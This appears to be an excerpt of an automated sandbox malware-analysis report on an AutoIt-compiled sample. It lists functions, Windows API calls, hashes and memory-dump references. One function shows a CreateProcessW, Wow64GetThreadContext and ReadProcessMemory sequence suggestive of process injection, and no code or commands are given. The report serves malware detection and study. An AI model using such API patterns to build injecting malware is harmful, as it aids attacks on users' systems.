Opcode Fuzzy Hash: 3802118461eb06d09feaa2eac73becde4473b796843eddeef4e9b84dc4ab01be
Instruction Fuzzy Hash: 99D05B7554030D6BDB509B90DC0DF9A773CD704700F0002F1BB5495091D97555588B95

Function 004BCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a860a4481c84cc596feeffa8e8dd500caad6a008d9442570444b6717341905
Instruction ID: fa0fcb8314e4c92eec4c855f4547f110b1be510e967e832e7c8ec22254f0be4a
Opcode Fuzzy Hash: 10a860a4481c84cc596feeffa8e8dd500caad6a008d9442570444b6717341905
Instruction Fuzzy Hash: 83F138746083009FCB14DF29C480A6ABBE5FF88318F14896EF8999B351D734E945CF96

Function 0044434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00444370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00444415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00444432

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 4df2ab85d5252401c0df2d723684cc937caaeb1e247f382300a9910f20bedc11
Instruction ID: 3163a93bf5ab061b1048d76abe9d3d4ece6c9da2582e0602702bc644f834178c
Opcode Fuzzy Hash: 4df2ab85d5252401c0df2d723684cc937caaeb1e247f382300a9910f20bedc11
Instruction Fuzzy Hash: FD3181706057018FD720DF24D88479BBBF8FF98708F00092EE59A82351E774A948CB9A

Function 0046571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00465733

Part of subcall function 0046A16B: __NMSG_WRITE.LIBCMT ref: 0046A192
Part of subcall function 0046A16B: __NMSG_WRITE.LIBCMT ref: 0046A19C

__NMSG_WRITE.LIBCMT ref: 0046573A

Part of subcall function 0046A1C8: GetModuleFileNameW.KERNEL32(00000000,005033BA,00000104,?,00000001,00000000), ref: 0046A25A
Part of subcall function 0046A1C8: ___crtMessageBoxW.LIBCMT ref: 0046A308

Part of subcall function 0046309F: ___crtCorExitProcess.LIBCMT ref: 004630A5
Part of subcall function 0046309F: ExitProcess.KERNEL32 ref: 004630AE

Part of subcall function 00468B28: __getptd_noexit.LIBCMT ref: 00468B28

RtlAllocateHeap.NTDLL(00AC0000,00000000,00000001,00000000,?,?,?,00460DD3,?), ref: 0046575F

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 3e9e7009161326827595f7b05f560cccbc435d5ef52e13c7f4e7edd54657177f
Instruction ID: b1303c993de589db1c883124cf3fec4d57eb8e511550421ab04384b68ac48e37
Opcode Fuzzy Hash: 3e9e7009161326827595f7b05f560cccbc435d5ef52e13c7f4e7edd54657177f
Instruction Fuzzy Hash: D1019235240A02DAD6102B36EC52A6E638C9B5276BF10053FF505AA2C2FE7C9C41966F

Function 004A98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,004A9548,?,?,?,?,?,00000004), ref: 004A98BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,004A9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004A98D1
CloseHandle.KERNEL32(00000000,?,004A9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004A98D8

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 2c28767206d5881723cacb5fdf0764084b905b0948a218bbb184326dfae9525f
Instruction ID: 4a0600e7ac14a11bb8e315cb29be8213f973282897f7538088f569dd1a89fd7f
Opcode Fuzzy Hash: 2c28767206d5881723cacb5fdf0764084b905b0948a218bbb184326dfae9525f
Instruction Fuzzy Hash: 37E08632141214B7D7212B54EC09FCA7B1AAB06760F144131FB14690E087B52915979C

Function 0044A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0047FC01

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 0e26ac3682b3b30c9e48366658479cc4b3b08425f33f1dbb27c427a3b85754a7
Instruction ID: 1ce29e227f54f88fddc46700878c18480045c3b2d9c99b5eeab9ee53f87076ec
Opcode Fuzzy Hash: 0e26ac3682b3b30c9e48366658479cc4b3b08425f33f1dbb27c427a3b85754a7
Instruction Fuzzy Hash: 47225B70548201DFEB24DF14C494A6AB7E1FF84304F14896EE89A9B362D739EC55CB8B

Function 00447A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00447AAB
_memmove.LIBCMT ref: 00447B16

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
Instruction ID: 99ff040147488025d7720d6b5e2a5250f684f70e69ef653fa2b6bcd7e57fe216
Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
Instruction Fuzzy Hash: 9F31D6B1604606AFD704DF69C8D1D6AF3A9FF48314714862EE519CB391EB38F911CB94

Function 004447D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00444834

Part of subcall function 0046336C: __lock.LIBCMT ref: 00463372
Part of subcall function 0046336C: DecodePointer.KERNEL32(00000001,?,00444849,00497C74), ref: 0046337E
Part of subcall function 0046336C: EncodePointer.KERNEL32(?,?,00444849,00497C74), ref: 00463389

Part of subcall function 004448FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00444915
Part of subcall function 004448FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0044492A

Part of subcall function 00443B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00443B68
Part of subcall function 00443B3A: IsDebuggerPresent.KERNEL32 ref: 00443B7A
Part of subcall function 00443B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,005052F8,005052E0,?,?), ref: 00443BEB
Part of subcall function 00443B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00443C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00444874

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 192085f2c662049db50d61f130a41d3ebb2f4cf3793070d67833bd665cdda82d
Instruction ID: e4e8d443e253a39a28302144dc84e24b7d8a5ece6a0dcbb404d1179e0f3d1d68
Opcode Fuzzy Hash: 192085f2c662049db50d61f130a41d3ebb2f4cf3793070d67833bd665cdda82d
Instruction Fuzzy Hash: E511AC719083469BDB00EF29D84590FBFE8EFA5754F10452FF440832B1EB749948DB9A

Function 00460DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0046571C: __FF_MSGBANNER.LIBCMT ref: 00465733
Part of subcall function 0046571C: __NMSG_WRITE.LIBCMT ref: 0046573A
Part of subcall function 0046571C: RtlAllocateHeap.NTDLL(00AC0000,00000000,00000001,00000000,?,?,?,00460DD3,?), ref: 0046575F

std::exception::exception.LIBCMT ref: 00460DEC
__CxxThrowException@8.LIBCMT ref: 00460E01

Part of subcall function 0046859B: RaiseException.KERNEL32(?,?,?,004F9E78,00000000,?,?,?,?,00460E06,?,004F9E78,?,00000001), ref: 004685F0

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: a48c161b75c658f2da829cacf92ba77d4b30ce1b2ee2c904f00775957e965bac
Instruction ID: 6d341c1102de1c9d5b5d245b92b294978470389b5d8cbcda89b9429f89135a73
Opcode Fuzzy Hash: a48c161b75c658f2da829cacf92ba77d4b30ce1b2ee2c904f00775957e965bac
Instruction Fuzzy Hash: 7EF0A47550022D66CB10BA95ED11ADF7BAC9F11315F10456FFD0896381FFB99A8082DF

Function 004653A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00468B28: __getptd_noexit.LIBCMT ref: 00468B28

__lock_file.LIBCMT ref: 004653EB

Part of subcall function 00466C11: __lock.LIBCMT ref: 00466C34

__fclose_nolock.LIBCMT ref: 004653F6

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: bdcd655ee85b3c6094e7c5617e9fb6157202e0345bcf9f3023eba8262b82e9ac
Instruction ID: 14bab993281f224849f397ee6ca727706c422b79ae2b3e232578c4d11e60b319
Opcode Fuzzy Hash: bdcd655ee85b3c6094e7c5617e9fb6157202e0345bcf9f3023eba8262b82e9ac
Instruction Fuzzy Hash: 83F09671800B049ADB106F6698057AE77A06F41778F21830FA824AB2C1EFBC59819B5F

Function 00B06785 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00B06F43
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00B06FD9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00B06FFB

Memory Dump Source

Source File: 00000000.00000002.1517936624.0000000000B05000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B05000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b05000_AxKxwW9WGa.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction ID: bb112c023aa27536fac107833f6c058448c72d257d15e527f983edcb935799ae
Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction Fuzzy Hash: 8212DE20E18658C6EB24DF64D8507DEB272FF68300F1090E9910DEB7A5E77A4F81CB5A

Function 0044750F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004475EA

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d2bfcf7297391e768810fd76e2336bb89c6a53483e9f203b05f212f2b75fd123
Instruction ID: 4a73f1efea3da05ccd01945d8c3015504755d6b5838c7ea0e2136319eb1eecc9
Opcode Fuzzy Hash: d2bfcf7297391e768810fd76e2336bb89c6a53483e9f203b05f212f2b75fd123
Instruction Fuzzy Hash: 3531A275208A12AFE724DF19D080922F7A0FF09310714C56FE98ACFB95E734E852CB89

Function 00460C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00460CB7

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: a8e8a94be28643dafd0177e6ea3907495ce30d9ad63a8e6f200cb6d6fc77c54f
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: EF31F570A001059FC71CDF08C48496AF7A6FB49300B2487A6E80ACB355E735EDC1DBCA

Function 0047FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0047FCB7

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 08cd318cab231e42a38b66e291bd992abefac59055fe4530902f26a11148d519
Instruction ID: 446907ae450d4499f564f36f3ca238900fdca5b7f5a7502809b80b4e5d20d548
Opcode Fuzzy Hash: 08cd318cab231e42a38b66e291bd992abefac59055fe4530902f26a11148d519
Instruction Fuzzy Hash: DF413C746043519FEB24DF14C444B1ABBE1BF45318F09886DE8998B362C73AEC49CF5A

Function 00447B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00447BB3

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: c58fdfa9ca095745a7cdbbf30d3cd360bcc2451cda2fbf88c976646c4c88f0d9
Instruction ID: 437fb9accaabcb68bdc9e1e118f51cdc934a5e68887bab4f6d3a6171e18aa523
Opcode Fuzzy Hash: c58fdfa9ca095745a7cdbbf30d3cd360bcc2451cda2fbf88c976646c4c88f0d9
Instruction Fuzzy Hash: CA213872A04A08EFDB148F16E8417BA7BB4FB18354F21C56FE84AC5190EB3494E0D74E

Function 00444DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00444BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00444BEF

Part of subcall function 0046525B: __wfsopen.LIBCMT ref: 00465266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00444E0F

Part of subcall function 00444B6A: FreeLibrary.KERNEL32(00000000), ref: 00444BA4

Part of subcall function 00444C70: _memmove.LIBCMT ref: 00444CBA

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 19f8ed7eb3418fbac48f7ebe1a520892ea40f5018684870891a08c214220c605
Instruction ID: 8b9161acfe92b1507c9cb4e7cf0181f7e7c63174a2728fa0c7b4915f0b83caad
Opcode Fuzzy Hash: 19f8ed7eb3418fbac48f7ebe1a520892ea40f5018684870891a08c214220c605
Instruction Fuzzy Hash: 8611E731600205ABEF14BF71C812FAE77A5AF84714F20842FF541A7181EA799E059B59

Function 0047FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0047FD91

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1f4b31d6d7760215bf67c22e5c8d5786d3591bb482cbbfdc5a3b94e9aa8599dd
Instruction ID: 7910b8792366e0aefb41571ea967cb86a845a8fbfdcfd2e96b8d1462531c377a
Opcode Fuzzy Hash: 1f4b31d6d7760215bf67c22e5c8d5786d3591bb482cbbfdc5a3b94e9aa8599dd
Instruction Fuzzy Hash: 8B2115B4A08301DFEB54DF24C444A1BBBE1BF84314F05896EE88957762D739E819CB9B

Function 00464863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 004648A6

Part of subcall function 00468B28: __getptd_noexit.LIBCMT ref: 00468B28

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 87abe377452c9ec65c152d07a9d898914aaccb961f12e8d143a0cbdf9788a844
Instruction ID: 8bdcd44e04529792d5da87b738549765794f6887c6a566d769786bc583bb5a3a
Opcode Fuzzy Hash: 87abe377452c9ec65c152d07a9d898914aaccb961f12e8d143a0cbdf9788a844
Instruction Fuzzy Hash: ACF0FF71800608ABDF11BFAA8C063AE37A0AF40329F11850EB4209B281EB7C8951DF5B

Function 00444E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,005052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00444E7E

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 53178a65b713fdda8daf800443af267caebb89af1318878214e8fe2c3d1e140e
Instruction ID: 105ea1d888292a5f24985dcf7721b273c6f6d16e4f8ea3335c8fc87b68ae0468
Opcode Fuzzy Hash: 53178a65b713fdda8daf800443af267caebb89af1318878214e8fe2c3d1e140e
Instruction Fuzzy Hash: BFF03971501711CFEB349F64E494913BBE1BFA43293248A3FE1D682720C73A9884DF49

Function 00460791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004607B0

Part of subcall function 00447BCC: _memmove.LIBCMT ref: 00447C06

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: LongNamePath_memmove
